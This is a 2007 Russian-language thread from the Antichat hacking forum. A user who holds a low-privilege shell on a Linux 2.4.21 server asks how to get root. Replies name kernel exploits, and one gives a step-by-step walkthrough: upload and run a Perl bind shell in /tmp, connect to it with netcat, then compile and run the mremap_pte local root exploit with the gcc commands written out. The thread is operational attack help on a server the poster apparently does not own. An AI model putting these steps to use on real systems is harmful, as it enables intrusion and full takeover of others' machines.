Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   *nix (https://forum.antichat.xyz/forumdisplay.php?f=43)
-   -   Linux 2.4.21-40.ELsmp (https://forum.antichat.xyz/showthread.php?t=30670)

Lancellot 06.01.2007 03:32
Linux 2.4.21-40.ELsmp
 
Ку!Есть шелл на сервере с такой ОС Linux 2.4.21-40.ELsmp,права у меня uid=99(nobody) gid=99(nobody) groups=99(nobody)!
Сервер :Apache/1.3.37 (Unix)
=========================================
Вопрос :Есть сплоит для поднятий привилегий?
Я искал не нашел!
Или есть другой способ как добыть права ближе к руту!
==========================================
Заранее спасибо!
З.Ы Я вот здесь нашел какойто сплоит подойдет он !
С меня +++++

guest3297 06.01.2007 03:54
brk
mremap
elf

Lancellot 06.01.2007 03:58
cash ,теперь нормальным языком чего ты хотел сказать!?

KPOT_f!nd 06.01.2007 06:55
Lancellot
вообще то мог тут задать свои вопрос. Это касается ОС:Linux.
Цитата:
cash ,теперь нормальным языком чего ты хотел сказать!?
Почитай здесь:
Цитата:
forum.antichat.ru/thread29605.html

zl0ba 06.01.2007 07:02
Будем брать експлоитом mremap_pte.
Для этого нам надо пробиндить тачку, что бы получить шелл обалочку. Ищем открытую папку для заливки файла.
По дефолту это папка tmp. Залеваем bind.pl и запускаем командой perl bind.pl. Открываем net cat и вбиваем
www.xxxxxxx.xxx 32767. Появился back conect. Проверяем на наличии компилятора командой which gcc.
Залеваем наш експлоит в tmp. Компилим gcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte.
Запускаем ./mremap_pte и проверяем права.

NIGHT_WOLF 06.01.2007 11:06
Чтобы новую тему не открывать спрошу сдесь.
FreeBSD 5.5-RELEASE-p2 для этого существуют сплоиты в паблике ?

guest3297 06.01.2007 11:07
нет

Lancellot 06.01.2007 18:45
Всем спасибо!Направили на правильный путь,роскрыли глаза!!!


Время: 09:21